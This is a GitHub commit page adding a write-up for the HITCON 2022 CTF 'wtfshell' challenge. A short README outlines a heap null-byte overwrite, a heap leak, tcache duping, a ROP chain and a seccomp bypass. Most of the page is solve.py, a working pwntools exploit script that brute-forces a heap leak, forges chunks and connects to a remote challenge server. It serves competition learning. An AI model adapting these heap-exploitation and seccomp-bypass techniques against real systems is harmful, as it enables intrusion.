Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit d183fe3

Browse files
Alex LinAlex Lin
Alex Lin
authored and
Alex Lin
committed
Wtfshell writeups
1 parent a886c09 commit d183fe3

File tree

3 files changed

+565
-0
lines changed

3 files changed

+565
-0
lines changed

‎2022/hitcon-2022/wtfshell/README.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
The bug is in strtok and remove\_slash, allowing us a null byte overwrite to 0x21 '!'. Another bug is non-null terminated password, which gives us heap leak. Heap massage and use bug to backwards consolidate overlapping chunks. Tcache dupe onto stack, ropchain into shellcode, use openat in 32-bit mode to bypass seccomp.

‎2022/hitcon-2022/wtfshell/solve.py

Lines changed: 177 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,177 @@
1+
from pwn import *
2+
3+
a = open("log", "w")
4+
5+
# r = process("./wtfshell")
6+
r = remote("35.233.147.96", 42531)
7+
8+
def rec(): return r.recvuntil("\xe2\x88\x9a ")
9+
rec()
10+
r.sendline("stfu.B")
11+
r.sendline("stfu.A")
12+
rec()
13+
14+
leak = "\x80"
15+
16+
r.sendline("asap.A")
17+
r.recvuntil(":")
18+
r.send("A"*0x40)
19+
r.recvuntil(":")
20+
r.send("A"*0x40)
21+
22+
while len(leak) < 6:
23+
for c in range(0, 256):
24+
print(c)
25+
if c == 10:
26+
continue
27+
28+
a = ""
29+
r.send(chr(c) + "\n")
30+
try:
31+
a = r.recvuntil("\xe2\x88\x9a ", timeout=0.5)
32+
except:
33+
pass
34+
35+
if "\xe2\x88\x9a" not in a or "Q.E.D" in a:
36+
leak += chr(c)
37+
print(leak)
38+
break
39+
else:
40+
r.sendline("asap.A")
41+
r.recvuntil(":")
42+
r.send("A"*0x40)
43+
r.recvuntil(":")
44+
r.send("A"*0x40)
45+
for k in leak:
46+
r.send(k)
47+
48+
heap = u64(leak + "\x00\x00")
49+
print("HEAP", hex(heap))
50+
51+
r.sendline("sus.A")
52+
r.sendline("A")
53+
r.sendline("sus")
54+
rec()
55+
56+
files = [chr(0x41 + i) for i in range(30)]
57+
for i in range(20):
58+
r.sendline("nsfw.{}.3".format(files[i]))
59+
rec()
60+
r.sendline("wtf." + "B"*0x3f8 + ".A")
61+
rec()
62+
for i in range(12):
63+
r.sendline("rip.A")
64+
if i == 0:
65+
payload = "A"*8 + "/\x03//////"
66+
r.send(payload + "A"*(0x100 - len(payload)))
67+
else:
68+
r.send("D"*0x100)
69+
rec()
70+
71+
r.sendline("wtf." + "B"*0x3f8 + ".B")
72+
rec()
73+
74+
for i in range(4, 4+6):
75+
r.sendline("wtf." + "B"*0x3f8 + "." + files[i]) # E, F, G, H, I, J
76+
rec()
77+
for i in range(4+6, 4+6+7):
78+
r.sendline("wtf." + "B"*0x2e8 + "." + files[i]) # E, F, G, H, I, J
79+
rec()
80+
81+
r.sendline("rip.A")
82+
r.send("D"*0x100)
83+
rec()
84+
85+
86+
r.sendline("wtf." + "B"*0x3f8 + ".C") # 0x410 chunk
87+
rec()
88+
89+
r.sendline("wtf." + "D"*0x3f8 + ".D")
90+
rec()
91+
for i in range(4):
92+
r.sendline("rip.D")
93+
r.send("D"*0x100)
94+
rec()
95+
96+
for i in range(4+6, 4+6+7):
97+
r.sendline("gtfo." + files[i])
98+
rec()
99+
r.sendline("gtfo.E")
100+
r.sendline("gtfo.F")
101+
r.sendline("gtfo.G")
102+
r.sendline("gtfo.H")
103+
r.sendline("gtfo.I")
104+
r.sendline("gtfo.J")
105+
r.sendline("rip.C")
106+
r.sendline("B"*0x10)
107+
for i in range(7): rec()
108+
109+
r.sendline("irl")
110+
rec()
111+
112+
# Now let's construct 0x321 victim
113+
for i in range(10):
114+
r.sendline("nsfw.{}.3".format(files[i]))
115+
rec()
116+
117+
r.sendline("wtf." + "A"*0x2b8 + ".A")
118+
rec()
119+
120+
r.sendline("wtf." + "E"*0x208 + ".B") # B is victim
121+
rec()
122+
r.sendline("rip.B")
123+
r.send("E"*0x100)
124+
rec()
125+
126+
# Eat up other bins
127+
r.sendline("wtf." + "A"*0x170 + ".C")
128+
rec()
129+
r.sendline("wtf." + "A"*0x130 + ".D")
130+
rec()
131+
r.sendline("wtf." + "A"*0xb0 + ".E")
132+
rec()
133+
r.sendline("wtf." + "A"*0x30 + ".F")
134+
rec()
135+
r.sendline("wtf." + "A"*0x220 + ".G")
136+
rec()
137+
r.sendline("wtf." + "A"*0x220 + ".H")
138+
rec()
139+
140+
# Trigger bug
141+
r.send("A"*0x400)
142+
rec()
143+
r.send("gtfo." + "A"*(0x400 - 5))
144+
rec()
145+
146+
for i in range(6):
147+
r.sendline("wtf." + "F"*(0x2f8 + (6 - i)) + "\x31" + ".B")
148+
rec()
149+
150+
r.sendline("wtf." + "F"*0x2f8 + "\x01\x09" + ".B")
151+
rec()
152+
153+
victim_addr = heap + 0xa30
154+
fake_fd_bk = heap + 0x740
155+
fake_unlink = fake_fd_bk - 0x10
156+
157+
# Do backwards consolidation
158+
payload = "gtfo.B."
159+
payload += "A"*(0x100-len(payload)) + p64(0x0) + p64(0x301) + p64(fake_fd_bk) + p64(fake_fd_bk) + p64(fake_unlink)*2
160+
r.sendline(payload)
161+
rec()
162+
163+
for i in range(2):
164+
uname = chr(0x41 + i)*2
165+
r.sendline("stfu,{}.".format(uname))
166+
rec()
167+
168+
r.sendline("sus.BB")
169+
r.sendline("nsfw.flag.3")
170+
171+
flag_loc = heap - 0x520
172+
173+
payload = "A"*0xff + "." + p64(0x0) + p64(0x61) + "B"*0x40 + p64(flag_loc) + "\x02"
174+
r.sendline(payload)
175+
r.sendline("lol.-l")
176+
177+
r.interactive()

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /